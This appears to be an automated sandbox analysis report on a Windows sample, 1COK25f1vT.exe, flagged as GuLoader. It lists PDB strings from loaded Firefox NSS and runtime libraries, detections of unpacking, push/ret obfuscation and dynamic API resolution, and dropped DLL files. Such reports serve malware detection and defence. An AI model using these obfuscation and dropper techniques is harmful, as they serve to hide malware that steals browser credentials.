Source: Binary string: msvcp140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source: Binary string: ucrtbase.pdbUGP source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.12.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.12.dr
Source: Binary string: vcruntime140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.12.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\1COK25f1vT.exe Unpacked PE file: 12.2.1COK25f1vT.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.385834969.000000001FC24000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.383092369.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00401C74 push 15091DEAh; retf 0_2_00401C79
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00407496 push edx; ret 0_2_00407497
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_004058B3 push edx; ret 0_2_004058B4
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00403343 push edi; ret 0_2_00403364
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00404B0D push di; ret 0_2_00404B18
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00401DCF push edi; ret 0_2_00401DD8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_004071D7 push edi; ret 0_2_004071D8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_004061F5 push esi; ret 0_2_004061FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_00406B98 push cs; retf 0_2_00406C33
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A92AFC pushad ; retn 0004h 0_2_02A92E3B
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A932F4 push esi; iretd 0_2_02A9334A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A938DA push eax; iretd 0_2_02A93AB2
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A93407 push 29C13045h; iretd 0_2_02A9340D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041A068 push 0041A08Eh; ret 12_2_0041A086
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041A02C push 0041A05Ch; ret 12_2_0041A054
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040E8D0 push 0040E905h; ret 12_2_0040E8FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040B164 push 0040B190h; ret 12_2_0040B188
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040E908 push 0040E94Ah; ret 12_2_0040E942
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040B12C push 0040B158h; ret 12_2_0040B150
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040C136 push 0040C164h; ret 12_2_0040C15C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040C138 push 0040C164h; ret 12_2_0040C15C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040813C push 00408174h; ret 12_2_0040816C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004171E8 push 00417214h; ret 12_2_0041720C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040C9EA push 0040CA18h; ret 12_2_0040CA10
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040C9EC push 0040CA18h; ret 12_2_0040CA10
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040E1A4 push 0040E1D0h; ret 12_2_0040E1C8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040B1B8 push 0040B1E4h; ret 12_2_0040B1DC
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040E25A push 0040E288h; ret 12_2_0040E280
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040E25C push 0040E288h; ret 12_2_0040E280
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414A18 push 00414A84h; ret 12_2_00414A7C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414A28 push 00414A84h; ret 12_2_00414A7C
PE file contains sections with non-standard names
Source: msvcp140.dll.12.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_00417216
PE file contains an invalid checksum
Source: api-ms-win-crt-environment-l1-1-0.dll.12.dr Static PE information: real checksum: 0x10447 should be: 0x13239
Binary contains a suspicious time stamp
Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.dr Static PE information: 0xE9891720 [Sat Feb 27 02:21:20 2094 UTC]

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
